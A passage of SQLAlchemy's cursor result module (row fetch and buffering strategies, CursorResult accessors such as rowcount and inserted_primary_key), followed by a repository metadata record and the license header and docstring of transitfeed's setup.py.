self._raise_for_ambiguous_column_name(rec)
yield cast(_NonAmbigCursorKeyMapRecType, rec)
def __getstate__(self):
# TODO: consider serializing this as SimpleResultMetaData
return {
"_keymap": {
key: (
rec[MD_INDEX],
rec[MD_RESULT_MAP_INDEX],
[],
key,
rec[MD_RENDERED_NAME],
None,
None,
)
for key, rec in self._keymap.items()
if isinstance(key, (str, int))
},
"_keys": self._keys,
"_translated_indexes": self._translated_indexes,
}
def __setstate__(self, state):
self._processors = [None for _ in range(len(state["_keys"]))]
self._keymap = state["_keymap"]
self._keymap_by_result_column_idx = None
self._key_to_index = self._make_key_to_index(self._keymap, MD_INDEX)
self._keys = state["_keys"]
self._unpickled = True
if state["_translated_indexes"]:
self._translated_indexes = cast(
"List[int]", state["_translated_indexes"]
)
self._tuplefilter = tuplegetter(*self._translated_indexes)
else:
self._translated_indexes = self._tuplefilter = None
class ResultFetchStrategy:
"""Define a fetching strategy for a result object.
.. versionadded:: 1.4
"""
__slots__ = ()
alternate_cursor_description: Optional[_DBAPICursorDescription] = None
def soft_close(
self, result: CursorResult[Any], dbapi_cursor: Optional[DBAPICursor]
) -> None:
raise NotImplementedError()
def hard_close(
self, result: CursorResult[Any], dbapi_cursor: Optional[DBAPICursor]
) -> None:
raise NotImplementedError()
def yield_per(
self,
result: CursorResult[Any],
dbapi_cursor: Optional[DBAPICursor],
num: int,
) -> None:
return
def fetchone(
self,
result: CursorResult[Any],
dbapi_cursor: DBAPICursor,
hard_close: bool = False,
) -> Any:
raise NotImplementedError()
def fetchmany(
self,
result: CursorResult[Any],
dbapi_cursor: DBAPICursor,
size: Optional[int] = None,
) -> Any:
raise NotImplementedError()
def fetchall(
self,
result: CursorResult[Any],
dbapi_cursor: DBAPICursor,
) -> Any:
raise NotImplementedError()
def handle_exception(
self,
result: CursorResult[Any],
dbapi_cursor: Optional[DBAPICursor],
err: BaseException,
) -> NoReturn:
raise err
class NoCursorFetchStrategy(ResultFetchStrategy):
"""Cursor strategy for a result that has no open cursor.
There are two varieties of this strategy, one for DQL and one for
DML (and also DDL), each of which represent a result that had a cursor
but no longer has one.
"""
__slots__ = ()
def soft_close(self, result, dbapi_cursor):
pass
def hard_close(self, result, dbapi_cursor):
pass
def fetchone(self, result, dbapi_cursor, hard_close=False):
return self._non_result(result, None)
def fetchmany(self, result, dbapi_cursor, size=None):
return self._non_result(result, [])
def fetchall(self, result, dbapi_cursor):
return self._non_result(result, [])
def _non_result(self, result, default, err=None):
raise NotImplementedError()
class NoCursorDQLFetchStrategy(NoCursorFetchStrategy):
"""Cursor strategy for a DQL result that has no open cursor.
This is a result set that can return rows, i.e. for a SELECT, or for an
INSERT, UPDATE, DELETE that includes RETURNING. However it is in the state
where the cursor is closed and no rows remain available. The owning result
object may or may not be "hard closed", which determines if the fetch
methods send empty results or raise for closed result.
"""
__slots__ = ()
def _non_result(self, result, default, err=None):
if result.closed:
raise exc.ResourceClosedError(
"This result object is closed."
) from err
else:
return default
_NO_CURSOR_DQL = NoCursorDQLFetchStrategy()
class NoCursorDMLFetchStrategy(NoCursorFetchStrategy):
"""Cursor strategy for a DML result that has no open cursor.
This is a result set that does not return rows, i.e. for an INSERT,
UPDATE, DELETE that does not include RETURNING.
"""
__slots__ = ()
def _non_result(self, result, default, err=None):
# we only expect to have a _NoResultMetaData() here right now.
assert not result._metadata.returns_rows
result._metadata._we_dont_return_rows(err)
_NO_CURSOR_DML = NoCursorDMLFetchStrategy()
class CursorFetchStrategy(ResultFetchStrategy):
"""Call fetch methods from a DBAPI cursor.
Alternate versions of this class may instead buffer the rows from
cursors or not use cursors at all.
"""
__slots__ = ()
def soft_close(
self, result: CursorResult[Any], dbapi_cursor: Optional[DBAPICursor]
) -> None:
result.cursor_strategy = _NO_CURSOR_DQL
def hard_close(
self, result: CursorResult[Any], dbapi_cursor: Optional[DBAPICursor]
) -> None:
result.cursor_strategy = _NO_CURSOR_DQL
def handle_exception(
self,
result: CursorResult[Any],
dbapi_cursor: Optional[DBAPICursor],
err: BaseException,
) -> NoReturn:
result.connection._handle_dbapi_exception(
err, None, None, dbapi_cursor, result.context
)
def yield_per(
self,
result: CursorResult[Any],
dbapi_cursor: Optional[DBAPICursor],
num: int,
) -> None:
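        # Swap in a row-buffering strategy with a fixed buffer size:
        # growth_factor=0 pins each refill at exactly ``num`` rows.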
result.cursor_strategy = BufferedRowCursorFetchStrategy(
dbapi_cursor,
{"max_row_buffer": num},
initial_buffer=collections.deque(),
growth_factor=0,
)
def fetchone(
self,
result: CursorResult[Any],
dbapi_cursor: DBAPICursor,
hard_close: bool = False,
) -> Any:
try:
row = dbapi_cursor.fetchone()
if row is None:
result._soft_close(hard=hard_close)
return row
except BaseException as e:
self.handle_exception(result, dbapi_cursor, e)
def fetchmany(
self,
result: CursorResult[Any],
dbapi_cursor: DBAPICursor,
size: Optional[int] = None,
) -> Any:
        try:
            if size is None:
                rows = dbapi_cursor.fetchmany()
            else:
                rows = dbapi_cursor.fetchmany(size)
            if not rows:
                result._soft_close()
            return rows
except BaseException as e:
self.handle_exception(result, dbapi_cursor, e)
def fetchall(
self,
result: CursorResult[Any],
dbapi_cursor: DBAPICursor,
) -> Any:
try:
rows = dbapi_cursor.fetchall()
result._soft_close()
return rows
except BaseException as e:
self.handle_exception(result, dbapi_cursor, e)
_DEFAULT_FETCH = CursorFetchStrategy()
class BufferedRowCursorFetchStrategy(CursorFetchStrategy):
"""A cursor fetch strategy with row buffering behavior.
This strategy buffers the contents of a selection of rows
before ``fetchone()`` is called. This is to allow the results of
``cursor.description`` to be available immediately, when
interfacing with a DB-API that requires rows to be consumed before
this information is available (currently psycopg2, when used with
server-side cursors).
    The pre-fetching behavior fetches only one row initially, and then
    grows its buffer size multiplicatively by ``growth_factor`` with each
    successive need for additional rows, up to the ``max_row_buffer`` size,
    which defaults to 1000::
with psycopg2_engine.connect() as conn:
result = conn.execution_options(
stream_results=True, max_row_buffer=50
).execute(text("select * from table"))
.. versionadded:: 1.4 ``max_row_buffer`` may now exceed 1000 rows.
.. seealso::
:ref:`psycopg2_execution_options`
"""
__slots__ = ("_max_row_buffer", "_rowbuffer", "_bufsize", "_growth_factor")
def __init__(
self,
dbapi_cursor,
execution_options,
growth_factor=5,
initial_buffer=None,
):
self._max_row_buffer = execution_options.get("max_row_buffer", 1000)
if initial_buffer is not None:
self._rowbuffer = initial_buffer
else:
self._rowbuffer = collections.deque(dbapi_cursor.fetchmany(1))
self._growth_factor = growth_factor
if growth_factor:
self._bufsize = min(self._max_row_buffer, self._growth_factor)
else:
self._bufsize = self._max_row_buffer
@classmethod
def create(cls, result):
return BufferedRowCursorFetchStrategy(
result.cursor,
result.context.execution_options,
)
def _buffer_rows(self, result, dbapi_cursor):
"""this is currently used only by fetchone()."""
size = self._bufsize
try:
if size < 1:
new_rows = dbapi_cursor.fetchall()
else:
new_rows = dbapi_cursor.fetchmany(size)
except BaseException as e:
self.handle_exception(result, dbapi_cursor, e)
if not new_rows:
return
self._rowbuffer = collections.deque(new_rows)
if self._growth_factor and size < self._max_row_buffer:
self._bufsize = min(
self._max_row_buffer, size * self._growth_factor
)
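            # e.g. with the defaults growth_factor=5 and max_row_buffer=1000,
            # successive fetch sizes are 1 (initial), 5, 25, 125, 625, then 1000.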
def yield_per(self, result, dbapi_cursor, num):
self._growth_factor = 0
self._max_row_buffer = self._bufsize = num
def soft_close(self, result, dbapi_cursor):
self._rowbuffer.clear()
super().soft_close(result, dbapi_cursor)
def hard_close(self, result, dbapi_cursor):
self._rowbuffer.clear()
super().hard_close(result, dbapi_cursor)
def fetchone(self, result, dbapi_cursor, hard_close=False):
if not self._rowbuffer:
self._buffer_rows(result, dbapi_cursor)
if not self._rowbuffer:
try:
result._soft_close(hard=hard_close)
except BaseException as e:
self.handle_exception(result, dbapi_cursor, e)
return None
return self._rowbuffer.popleft()
def fetchmany(self, result, dbapi_cursor, size=None):
if size is None:
return self.fetchall(result, dbapi_cursor)
buf = list(self._rowbuffer)
lb = len(buf)
if size > lb:
try:
new = dbapi_cursor.fetchmany(size - lb)
except BaseException as e:
self.handle_exception(result, dbapi_cursor, e)
else:
if not new:
result._soft_close()
else:
buf.extend(new)
result = buf[0:size]
self._rowbuffer = collections.deque(buf[size:])
return result
def fetchall(self, result, dbapi_cursor):
try:
ret = list(self._rowbuffer) + list(dbapi_cursor.fetchall())
self._rowbuffer.clear()
result._soft_close()
return ret
except BaseException as e:
self.handle_exception(result, dbapi_cursor, e)
class FullyBufferedCursorFetchStrategy(CursorFetchStrategy):
"""A cursor strategy that buffers rows fully upon creation.
Used for operations where a result is to be delivered
    after the database conversation cannot be continued,
such as MSSQL INSERT...OUTPUT after an autocommit.
"""
__slots__ = ("_rowbuffer", "alternate_cursor_description")
def __init__(
self, dbapi_cursor, alternate_description=None, initial_buffer=None
):
self.alternate_cursor_description = alternate_description
if initial_buffer is not None:
self._rowbuffer = collections.deque(initial_buffer)
else:
self._rowbuffer = collections.deque(dbapi_cursor.fetchall())
def yield_per(self, result, dbapi_cursor, num):
pass
def soft_close(self, result, dbapi_cursor):
self._rowbuffer.clear()
super().soft_close(result, dbapi_cursor)
def hard_close(self, result, dbapi_cursor):
self._rowbuffer.clear()
super().hard_close(result, dbapi_cursor)
def fetchone(self, result, dbapi_cursor, hard_close=False):
if self._rowbuffer:
return self._rowbuffer.popleft()
else:
result._soft_close(hard=hard_close)
return None
def fetchmany(self, result, dbapi_cursor, size=None):
if size is None:
return self.fetchall(result, dbapi_cursor)
buf = list(self._rowbuffer)
rows = buf[0:size]
self._rowbuffer = collections.deque(buf[size:])
if not rows:
result._soft_close()
return rows
def fetchall(self, result, dbapi_cursor):
ret = self._rowbuffer
self._rowbuffer = collections.deque()
result._soft_close()
return ret
class _NoResultMetaData(ResultMetaData):
__slots__ = ()
returns_rows = False
def _we_dont_return_rows(self, err=None):
raise exc.ResourceClosedError(
"This result object does not return rows. "
"It has been closed automatically."
) from err
def _index_for_key(self, keys, raiseerr):
self._we_dont_return_rows()
def _metadata_for_keys(self, key):
self._we_dont_return_rows()
def _reduce(self, keys):
self._we_dont_return_rows()
@property
def _keymap(self):
self._we_dont_return_rows()
@property
def _key_to_index(self):
self._we_dont_return_rows()
@property
def _processors(self):
self._we_dont_return_rows()
@property
def keys(self):
self._we_dont_return_rows()
_NO_RESULT_METADATA = _NoResultMetaData()
def null_dml_result() -> IteratorResult[Any]:
it: IteratorResult[Any] = IteratorResult(_NoResultMetaData(), iter([]))
it._soft_close()
return it
class CursorResult(Result[_T]):
"""A Result that is representing state from a DBAPI cursor.
    .. versionchanged:: 1.4 The :class:`.CursorResult`
    class replaces the previous :class:`.ResultProxy` interface.
    This class is based on the :class:`.Result` calling API
which provides an updated usage model and calling facade for
SQLAlchemy Core and SQLAlchemy ORM.
Returns database rows via the :class:`.Row` class, which provides
additional API features and behaviors on top of the raw data returned by
the DBAPI. Through the use of filters such as the :meth:`.Result.scalars`
method, other kinds of objects may also be returned.
.. seealso::
:ref:`tutorial_selecting_data` - introductory material for accessing
:class:`_engine.CursorResult` and :class:`.Row` objects.
"""
__slots__ = (
"context",
"dialect",
"cursor",
"cursor_strategy",
"_echo",
"connection",
)
_metadata: Union[CursorResultMetaData, _NoResultMetaData]
_no_result_metadata = _NO_RESULT_METADATA
_soft_closed: bool = False
closed: bool = False
_is_cursor = True
context: DefaultExecutionContext
dialect: Dialect
cursor_strategy: ResultFetchStrategy
connection: Connection
def __init__(
self,
context: DefaultExecutionContext,
cursor_strategy: ResultFetchStrategy,
cursor_description: Optional[_DBAPICursorDescription],
):
self.context = context
self.dialect = context.dialect
self.cursor = context.cursor
self.cursor_strategy = cursor_strategy
self.connection = context.root_connection
self._echo = echo = (
self.connection._echo and context.engine._should_log_debug()
)
if cursor_description is not None:
# inline of Result._row_getter(), set up an initial row
# getter assuming no transformations will be called as this
# is the most common case
metadata = self._init_metadata(context, cursor_description)
_make_row = functools.partial(
Row,
metadata,
metadata._effective_processors,
metadata._key_to_index,
)
if context._num_sentinel_cols:
sentinel_filter = operator.itemgetter(
slice(-context._num_sentinel_cols)
)
def _sliced_row(raw_data):
return _make_row(sentinel_filter(raw_data))
sliced_row = _sliced_row
else:
sliced_row = _make_row
if echo:
log = self.context.connection._log_debug
def _log_row(row):
log("Row %r", sql_util._repr_row(row))
return row
self._row_logging_fn = _log_row
def _make_row_2(row):
return _log_row(sliced_row(row))
make_row = _make_row_2
else:
make_row = sliced_row
self._set_memoized_attribute("_row_getter", make_row)
else:
assert context._num_sentinel_cols == 0
self._metadata = self._no_result_metadata
def _init_metadata(self, context, cursor_description):
if context.compiled:
compiled = context.compiled
if compiled._cached_metadata:
metadata = compiled._cached_metadata
else:
metadata = CursorResultMetaData(self, cursor_description)
if metadata._safe_for_cache:
compiled._cached_metadata = metadata
            # result rewrite / adapt step.  this is to suit the case
            # where we are invoked against a cached Compiled object; we want
# to rewrite the ResultMetaData to reflect the Column objects
# that are in our current SQL statement object, not the one
# that is associated with the cached Compiled object.
# the Compiled object may also tell us to not
            # actually do this step; this is to support the ORM, which
            # produces a new Result object in any case, and will
# be using the cached Column objects against this database result
# so we don't want to rewrite them.
#
# Basically this step suits the use case where the end user
# is using Core SQL expressions and is accessing columns in the
# result row using row._mapping[table.c.column].
if (
not context.execution_options.get(
"_result_disable_adapt_to_context", False
)
and compiled._result_columns
and context.cache_hit is context.dialect.CACHE_HIT
and compiled.statement is not context.invoked_statement
):
metadata = metadata._adapt_to_context(context)
self._metadata = metadata
else:
self._metadata = metadata = CursorResultMetaData(
self, cursor_description
)
if self._echo:
context.connection._log_debug(
"Col %r", tuple(x[0] for x in cursor_description)
)
return metadata
def _soft_close(self, hard=False):
"""Soft close this :class:`_engine.CursorResult`.
This releases all DBAPI cursor resources, but leaves the
CursorResult "open" from a semantic perspective, meaning the
fetchXXX() methods will continue to return empty results.
This method is called automatically when:
* all result rows are exhausted using the fetchXXX() methods.
* cursor.description is None.
This method is **not public**, but is documented in order to clarify
the "autoclose" process used.
.. seealso::
:meth:`_engine.CursorResult.close`
"""
if (not hard and self._soft_closed) or (hard and self.closed):
return
if hard:
self.closed = True
self.cursor_strategy.hard_close(self, self.cursor)
else:
self.cursor_strategy.soft_close(self, self.cursor)
if not self._soft_closed:
cursor = self.cursor
self.cursor = None # type: ignore
self.connection._safe_close_cursor(cursor)
self._soft_closed = True
@property
def inserted_primary_key_rows(self):
"""Return the value of
:attr:`_engine.CursorResult.inserted_primary_key`
as a row contained within a list; some dialects may support a
multiple row form as well.
.. note:: As indicated below, in current SQLAlchemy versions this
accessor is only useful beyond what's already supplied by
:attr:`_engine.CursorResult.inserted_primary_key` when using the
:ref:`postgresql_psycopg2` dialect. Future versions hope to
generalize this feature to more dialects.
This accessor is added to support dialects that offer the feature
that is currently implemented by the :ref:`psycopg2_executemany_mode`
feature, currently **only the psycopg2 dialect**, which provides
for many rows to be INSERTed at once while still retaining the
behavior of being able to return server-generated primary key values.
* **When using the psycopg2 dialect, or other dialects that may support
"fast executemany" style inserts in upcoming releases** : When
invoking an INSERT statement while passing a list of rows as the
second argument to :meth:`_engine.Connection.execute`, this accessor
will then provide a list of rows, where each row contains the primary
key value for each row that was INSERTed.
* **When using all other dialects / backends that don't yet support
this feature**: This accessor is only useful for **single row INSERT
statements**, and returns the same information as that of the
:attr:`_engine.CursorResult.inserted_primary_key` within a
single-element list. When an INSERT statement is executed in
conjunction with a list of rows to be INSERTed, the list will contain
one row per row inserted in the statement, however it will contain
``None`` for any server-generated values.
Future releases of SQLAlchemy will further generalize the
"fast execution helper" feature of psycopg2 to suit other dialects,
thus allowing this accessor to be of more general use.
.. versionadded:: 1.4
.. seealso::
:attr:`_engine.CursorResult.inserted_primary_key`
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled " "expression construct."
)
elif not self.context.isinsert:
raise exc.InvalidRequestError(
"Statement is not an insert() " "expression construct."
)
elif self.context._is_explicit_returning:
raise exc.InvalidRequestError(
"Can't call inserted_primary_key "
"when returning() "
"is used."
)
return self.context.inserted_primary_key_rows
@property
def inserted_primary_key(self):
"""Return the primary key for the row just inserted.
The return value is a :class:`_result.Row` object representing
a named tuple of primary key values in the order in which the
primary key columns are configured in the source
:class:`_schema.Table`.
.. versionchanged:: 1.4.8 - the
:attr:`_engine.CursorResult.inserted_primary_key`
value is now a named tuple via the :class:`_result.Row` class,
rather than a plain tuple.
This accessor only applies to single row :func:`_expression.insert`
constructs which did not explicitly specify
:meth:`_expression.Insert.returning`. Support for multirow inserts,
while not yet available for most backends, would be accessed using
the :attr:`_engine.CursorResult.inserted_primary_key_rows` accessor.
Note that primary key columns which specify a server_default clause, or
otherwise do not qualify as "autoincrement" columns (see the notes at
:class:`_schema.Column`), and were generated using the database-side
default, will appear in this list as ``None`` unless the backend
supports "returning" and the insert statement executed with the
"implicit returning" enabled.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() construct.
"""
if self.context.executemany:
raise exc.InvalidRequestError(
"This statement was an executemany call; if primary key "
"returning is supported, please "
"use .inserted_primary_key_rows."
)
ikp = self.inserted_primary_key_rows
if ikp:
return ikp[0]
else:
return None
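    # A hedged usage sketch (``users`` is a hypothetical Table bound to an
    # open Connection ``conn``; neither is part of this module):
    #
    #     result = conn.execute(users.insert().values(user_name="spongebob"))
    #     pk = result.inserted_primary_key            # Row named tuple, e.g. (1,)
    #     pk_rows = result.inserted_primary_key_rows  # e.g. [(1,)]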
def last_updated_params(self):
"""Return the collection of updated parameters from this
execution.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an update() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled " "expression construct."
)
elif not self.context.isupdate:
raise exc.InvalidRequestError(
"Statement is not an update() " "expression construct."
)
elif self.context.executemany:
return self.context.compiled_parameters
else:
return self.context.compiled_parameters[0]
def last_inserted_params(self):
"""Return the collection of inserted parameters from this
execution.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled " "expression construct."
)
elif not self.context.isinsert:
raise exc.InvalidRequestError(
"Statement is not an insert() " "expression construct."
)
elif self.context.executemany:
return self.context.compiled_parameters
else:
return self.context.compiled_parameters[0]
@property
def returned_defaults_rows(self):
"""Return a list of rows each containing the values of default
columns that were fetched using
the :meth:`.ValuesBase.return_defaults` feature.
The return value is a list of :class:`.Row` objects.
.. versionadded:: 1.4
"""
return self.context.returned_default_rows
def splice_horizontally(self, other):
"""Return a new :class:`.CursorResult` that "horizontally splices"
together the rows of this :class:`.CursorResult` with that of another
:class:`.CursorResult`.
.. tip:: This method is for the benefit of the SQLAlchemy ORM and is
not intended for general use.
"horizontally splices" means that for each row in the first and second
result sets, a new row that concatenates the two rows together is
produced, which then becomes the new row. The incoming
:class:`.CursorResult` must have the identical number of rows. It is
typically expected that the two result sets come from the same sort
order as well, as the result rows are spliced together based on their
position in the result.
The expected use case here is so that multiple INSERT..RETURNING
statements (which definitely need to be sorted) against different
tables can produce a single result that looks like a JOIN of those two
tables.
E.g.::
r1 = connection.execute(
users.insert().returning(
users.c.user_name,
users.c.user_id,
sort_by_parameter_order=True
),
user_values
)
r2 = connection.execute(
addresses.insert().returning(
addresses.c.address_id,
addresses.c.address,
addresses.c.user_id,
sort_by_parameter_order=True
),
address_values
)
rows = r1.splice_horizontally(r2).all()
assert (
rows ==
[
("john", 1, 1, "foo@bar.com", 1),
("jack", 2, 2, "bar@bat.com", 2),
]
)
.. versionadded:: 2.0
.. seealso::
:meth:`.CursorResult.splice_vertically`
"""
clone = self._generate()
total_rows = [
tuple(r1) + tuple(r2)
for r1, r2 in zip(
list(self._raw_row_iterator()),
list(other._raw_row_iterator()),
)
]
clone._metadata = clone._metadata._splice_horizontally(other._metadata)
clone.cursor_strategy = FullyBufferedCursorFetchStrategy(
None,
initial_buffer=total_rows,
)
clone._reset_memoizations()
return clone
def splice_vertically(self, other):
"""Return a new :class:`.CursorResult` that "vertically splices",
i.e. "extends", the rows of this :class:`.CursorResult` with that of
another :class:`.CursorResult`.
.. tip:: This method is for the benefit of the SQLAlchemy ORM and is
not intended for general use.
"vertically splices" means the rows of the given result are appended to
the rows of this cursor result. The incoming :class:`.CursorResult`
must have rows that represent the identical list of columns in the
identical order as they are in this :class:`.CursorResult`.
.. versionadded:: 2.0
.. seealso::
:meth:`.CursorResult.splice_horizontally`
"""
clone = self._generate()
total_rows = list(self._raw_row_iterator()) + list(
other._raw_row_iterator()
)
clone.cursor_strategy = FullyBufferedCursorFetchStrategy(
None,
initial_buffer=total_rows,
)
clone._reset_memoizations()
return clone
def _rewind(self, rows):
"""rewind this result back to the given rowset.
this is used internally for the case where an :class:`.Insert`
construct combines the use of
:meth:`.Insert.return_defaults` along with the
"supplemental columns" feature.
"""
if self._echo:
self.context.connection._log_debug(
"CursorResult rewound %d row(s)", len(rows)
)
# the rows given are expected to be Row objects, so we
# have to clear out processors which have already run on these
# rows
self._metadata = cast(
CursorResultMetaData, self._metadata
)._remove_processors()
self.cursor_strategy = FullyBufferedCursorFetchStrategy(
None,
# TODO: if these are Row objects, can we save on not having to
# re-make new Row objects out of them a second time? is that
# what's actually happening right now? maybe look into this
initial_buffer=rows,
)
self._reset_memoizations()
return self
@property
def returned_defaults(self):
"""Return the values of default columns that were fetched using
the :meth:`.ValuesBase.return_defaults` feature.
The value is an instance of :class:`.Row`, or ``None``
if :meth:`.ValuesBase.return_defaults` was not used or if the
backend does not support RETURNING.
.. seealso::
:meth:`.ValuesBase.return_defaults`
"""
if self.context.executemany:
raise exc.InvalidRequestError(
"This statement was an executemany call; if return defaults "
"is supported, please use .returned_defaults_rows."
)
rows = self.context.returned_default_rows
if rows:
return rows[0]
else:
return None
def lastrow_has_defaults(self):
"""Return ``lastrow_has_defaults()`` from the underlying
:class:`.ExecutionContext`.
See :class:`.ExecutionContext` for details.
"""
return self.context.lastrow_has_defaults()
def postfetch_cols(self):
"""Return ``postfetch_cols()`` from the underlying
:class:`.ExecutionContext`.
See :class:`.ExecutionContext` for details.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() or update() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled " "expression construct."
)
elif not self.context.isinsert and not self.context.isupdate:
raise exc.InvalidRequestError(
"Statement is not an insert() or update() "
"expression construct."
)
return self.context.postfetch_cols
def prefetch_cols(self):
"""Return ``prefetch_cols()`` from the underlying
:class:`.ExecutionContext`.
See :class:`.ExecutionContext` for details.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() or update() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled " "expression construct."
)
elif not self.context.isinsert and not self.context.isupdate:
raise exc.InvalidRequestError(
"Statement is not an insert() or update() "
"expression construct."
)
return self.context.prefetch_cols
def supports_sane_rowcount(self):
"""Return ``supports_sane_rowcount`` from the dialect.
See :attr:`_engine.CursorResult.rowcount` for background.
"""
return self.dialect.supports_sane_rowcount
def supports_sane_multi_rowcount(self):
"""Return ``supports_sane_multi_rowcount`` from the dialect.
See :attr:`_engine.CursorResult.rowcount` for background.
"""
return self.dialect.supports_sane_multi_rowcount
@util.memoized_property
def rowcount(self) -> int:
"""Return the 'rowcount' for this result.
The 'rowcount' reports the number of rows *matched*
by the WHERE criterion of an UPDATE or DELETE statement.
.. note::
Notes regarding :attr:`_engine.CursorResult.rowcount`:
* This attribute returns the number of rows *matched*,
which is not necessarily the same as the number of rows
that were actually *modified* - an UPDATE statement, for example,
may have no net change on a given row if the SET values
given are the same as those present in the row already.
Such a row would be matched but not modified.
On backends that feature both styles, such as MySQL,
rowcount is configured by default to return the match
count in all cases.
* :attr:`_engine.CursorResult.rowcount`
is *only* useful in conjunction
with an UPDATE or DELETE statement. Contrary to what the Python
DBAPI says, it does *not* return the
number of rows available from the results of a SELECT statement
as DBAPIs cannot support this functionality when rows are
unbuffered.
* :attr:`_engine.CursorResult.rowcount`
may not be fully implemented by
all dialects. In particular, most DBAPIs do not support an
aggregate rowcount result from an executemany call.
The :meth:`_engine.CursorResult.supports_sane_rowcount` and
:meth:`_engine.CursorResult.supports_sane_multi_rowcount` methods
will report from the dialect if each usage is known to be
supported.
* Statements that use RETURNING may not return a correct
rowcount.
.. seealso::
:ref:`tutorial_update_delete_rowcount` - in the :ref:`unified_tutorial`
""" # noqa: E501
try:
return self.context.rowcount
except BaseException as e:
self.cursor_strategy.handle_exception(self, self.cursor, e)
raise # not called
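    # Illustrative sketch (``users`` and ``conn`` are assumptions, not part of
    # this module); per the note above, the count reflects rows *matched* by
    # the WHERE clause, not necessarily rows changed:
    #
    #     result = conn.execute(
    #         users.update().where(users.c.active == False).values(active=True)
    #     )
    #     print(result.rowcount)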
@property
def lastrowid(self):
"""Return the 'lastrowid' accessor on the DBAPI cursor.
This is a DBAPI specific method and is only functional
for those backends which support it, for statements
        where it is appropriate. Its behavior is not
consistent across backends.
Usage of this method is normally unnecessary when
using insert() expression constructs; the
:attr:`~CursorResult.inserted_primary_key` attribute provides a
tuple of primary key values for a newly inserted row,
regardless of database backend.
"""
try:
return self.context.get_lastrowid()
except BaseException as e:
self.cursor_strategy.handle_exception(self, self.cursor, e)
@property
def returns_rows(self):
"""True if this :class:`_engine.CursorResult` returns zero or more
rows.
I.e. if it is legal to call the methods
:meth:`_engine.CursorResult.fetchone`,
        :meth:`_engine.CursorResult.fetchmany`, and
:meth:`_engine.CursorResult.fetchall`.
Overall, the value of :attr:`_engine.CursorResult.returns_rows` should
always be synonymous with whether or not the DBAPI cursor had a
``.description`` attribute, indicating the presence of result columns,
noting that a cursor that returns zero rows still has a
``.description`` if a row-returning statement was emitted.
This attribute should be True for all results that are against
SELECT statements, as well as for DML statements INSERT/UPDATE/DELETE
that use RETURNING. For INSERT/UPDATE/DELETE statements that were
not using RETURNING, the value will usually be False, however
there are some dialect-specific exceptions to this, such as when
using the MSSQL / pyodbc dialect a SELECT is emitted inline in
order to retrieve an inserted primary key value.
"""
return self._metadata.returns_rows
@property
def is_insert(self):
"""True if this :class:`_engine.CursorResult` is the result
        of executing an expression language compiled
:func:`_expression.insert` construct.
When True, this implies that the
:attr:`inserted_primary_key` attribute is accessible,
assuming the statement did not include
a user defined "returning" construct.
"""
return self.context.isinsert
def _fetchiter_impl(self):
fetchone = self.cursor_strategy.fetchone
while True:
row = fetchone(self, self.cursor)
if row is None:
break
yield row
def _fetchone_impl(self, hard_close=False):
return self.cursor_strategy.fetchone(self, self.cursor, hard_close)
def _fetchall_impl(self):
return self.cursor_strategy.fetchall(self, self.cursor)
def _fetchmany_impl(self, size=None):
return self.cursor_strategy.fetchmany(self, self.cursor, size)
def _raw_row_iterator(self):
return self._fetchiter_impl()
def merge(self, *others: Result[Any]) -> MergedResult[Any]:
merged_result = super().merge(*others)
setup_rowcounts = self.context._has_rowcount
if setup_rowcounts:
merged_result.rowcount = sum(
cast("CursorResult[Any]", result).rowcount
for result in (self,) + others
)
return merged_result
def close(self) -> Any:
"""Close this :class:`_engine.CursorResult`.
This closes out the underlying DBAPI cursor corresponding to the
statement execution, if one is still present. Note that the DBAPI
cursor is automatically released when the :class:`_engine.CursorResult`
exhausts all available rows. :meth:`_engine.CursorResult.close` is
generally an optional method except in the case when discarding a
:class:`_engine.CursorResult` that still has additional rows pending
for fetch.
After this method is called, it is no longer valid to call upon
the fetch methods, which will raise a :class:`.ResourceClosedError`
on subsequent use.
.. seealso::
:ref:`connections_toplevel`
"""
self._soft_close(hard=True)
@_generative
def yield_per(self, num: int) -> Self:
self._yield_per = num
self.cursor_strategy.yield_per(self, self.cursor, num)
return self
ResultProxy = CursorResult
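# A minimal end-to-end sketch of consuming a CursorResult (the in-memory
# SQLite URL and the trivial SELECT are illustration-only assumptions):
#
#     from sqlalchemy import create_engine, text
#
#     engine = create_engine("sqlite://")
#     with engine.connect() as conn:
#         result = conn.execute(text("SELECT 1 AS x"))
#         for row in result:      # rows are produced by the cursor strategy
#             print(row.x)        # Row supports attribute and mapping access
#         result.close()          # optional once all rows are exhausted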
|
1ed7e08b147b3b22517666e874d8d6dcf8ac4852
|
645aa520f2eff7e6001574e57c986aba129e4dd3
|
/setup.py
|
732936ba8dfb841c84e38ff19e4706ec92f065e5
|
[
"Apache-2.0"
] |
permissive
|
google/transitfeed
|
08c4ecfb6872b6c0dc409d9a35b32ef515e30253
|
104b5a5b339c62a94c1579d7209a41c7c0833e35
|
refs/heads/master
| 2023-09-05T03:08:17.640950
| 2022-05-23T16:23:53
| 2022-05-23T16:23:53
| 24,061,376
| 680
| 299
|
Apache-2.0
| 2022-09-28T09:02:50
| 2014-09-15T15:16:32
|
Python
|
UTF-8
|
Python
| false
| false
| 5,963
|
py
|
setup.py
|
#!/usr/bin/python2.5
# Copyright (C) 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This script can be used to create a source distribution, binary distribution
or Windows executable files. The output is put in dist/
See
https://github.com/google/transitfeed/wiki/BuildingPythonWindowsExecutables
for help on creating Windows executables.
"""
from distutils.core import setup
import glob
import os.path
from transitfeed import __version__ as VERSION
try:
